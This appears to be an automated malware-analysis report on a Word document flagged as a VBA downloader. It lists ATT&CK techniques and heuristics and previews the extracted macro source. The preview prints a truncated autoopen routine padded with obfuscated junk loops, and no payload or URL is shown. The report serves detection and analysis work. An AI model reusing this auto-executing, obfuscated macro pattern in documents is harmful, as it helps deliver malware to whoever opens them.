MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes GetObject and CreateObject to launch a process via WMI (Win32_Process), indicating an attempt to execute a secondary payload. ClamAV also identified this file as a downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.Sagent-6938008-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-6938008-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38883 bytes |
SHA-256: 4a51fd4282320c8a8605115f9490331b33a95afc1f422c14649b61642a2688b1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DDUwGA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CBAQAAQ"
Attribute VB_Base = "0{46282A81-997D-4CFC-9755-60F76D02FBCE}{EAEDC591-1CA4-45BE-960B-E278988AC6D0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "mUAAQAA"
Attribute VB_Base = "0{D5C06930-87F5-4643-92B7-A704F593397C}{272B7BC4-7759-4DBC-B6A3-3CF40F7AFCC4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "HkAG1AX"
Sub autoopen()
If XoCkUDAA = LAAACDw1 Then
Do While WBAC4kAB And oGGZAoU
While qoAQQAA And 308390607
AXUA1Q = Asc(876848353 / Oct(641485969))
Wend
For OAAQAwQ = 72674189 To 313119313
zCABcA = 33669867
Next
Set HAAZkDA = zowAAwZ
If jBoDcA Eqv 967607897 Then
vc1ABX = CDate(XAAAQAU)
End If
While pBZwBDU < vGQA_QA
tDAAAc = (YBUAUAGA)
Wend
Loop
End If
If U_DcXZQ_ = IAAABAwC Then
Do While DACX4QG_ And s4U4kD
While KXUUwDU And 319305645
AADUADA = Asc(235393707 / Oct(527725812))
Wend
For VADoCcB = 633716738 To 745494397
W4ACwDAB = 461559918
Next
Set B_ADAA = tBAAQDAA
If HGxxAA_ Eqv 952602168 Then
X1CUDU = CDate(DoBU4cQ)
End If
While SCB4QAw < zxwZ4XG
dADXUB = (UQADAwAG)
Wend
Loop
End If
l4U1kD
If NAUAQB_ = rG4G1D Then
Do While nwcBoQ And rXA1AAAk
While NACU_Q And 818106465
LQxADC = Asc(778725614 / Oct(670121892))
Wend
For hUxDAUG = 571866125 To 581875958
nZQABU = 292765752
Next
Set LxAUAAAA = zAkAZUw
If zQXwxD Eqv 469348400 Then
EAQZ4xA = CDate(RQ4oAQ)
End If
While sABAA4C < wxQ14A
rQA_QDU = (uAAkAAx)
Wend
Loop
End If
If DQADkD = c_kQDw Then
Do While XBAcDwG And UGAAxBXD
While PZQ4QA And 895886630
mBA_XQ4A = Asc(106337884 / Oct(350423822))
Wend
For sA_UU4AQ = 601251838 To 945267077
FoAGC4C = 453670911
Next
Set NAAwCUAD = qA_Q1Ak_
If EAAAAAU Eqv 928696060 Then
VwQoZAD = CDate(nkZocQB)
End If
While TAZ_U_ < uZoAGZA
iZB1BA = (zQBCXUZo)
Wend
Loop
End If
End Sub
Attribute VB_Name = "XUAA4ABA"
Function l4U1kD()
On Error Resume Next
If vAUDQU = BAQ1Ao Then
Do While cDAUw__ And oAcAAUA
While zBxZAUoA And 342594123
iAcUwAAA = Asc(210074705 / Oct(821253553))
Wend
For YcADD4cC = 615132368 To 765151774
jAx1UQAk = 896012357
Next
Set mD4A4A4A = AQQAAZU
If HAoDUoA Eqv 944372428 Then
vDCxwxxQ = CDate(qxAcDGA)
End If
While SxXAAAAB < bXXGGAAA
QxAZxA = (wUAACcB)
Wend
Loop
End If
If aAwkxX = LAXAwQA Then
Do While VAoAUA And VAZAAA
While I1BAXBGC And 800957531
CowwZAXC = Asc(214482043 / Oct(972335969))
Wend
For VQA4AU = 473269207 To 328813822
zAwUBB4A = 940025354
Next
Set jGwXZckU = lXX_Uk
If dAwBDA Eqv 174784521 Then
LDDAxQ = CDate(sBACUDAU)
End If
While tACXAD < GAB11xQ
SDwUGCAQ = (PAc4_cU1)
Wend
Loop
End If
If zUXUZAwQ = wAABAQ Then
Do While ZAQDGU And jGACQU4A
While dcB4AAA And 735536284
CAoQQUU = Asc(169594649 / Oct(4907049))
Wend
For XAAQBABU = 553118563 To 120487162
JcGZoo = 983199834
Next
Set zAUoACAA = pAAkBBB
If nAwZAAGA Eqv 109182654 Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.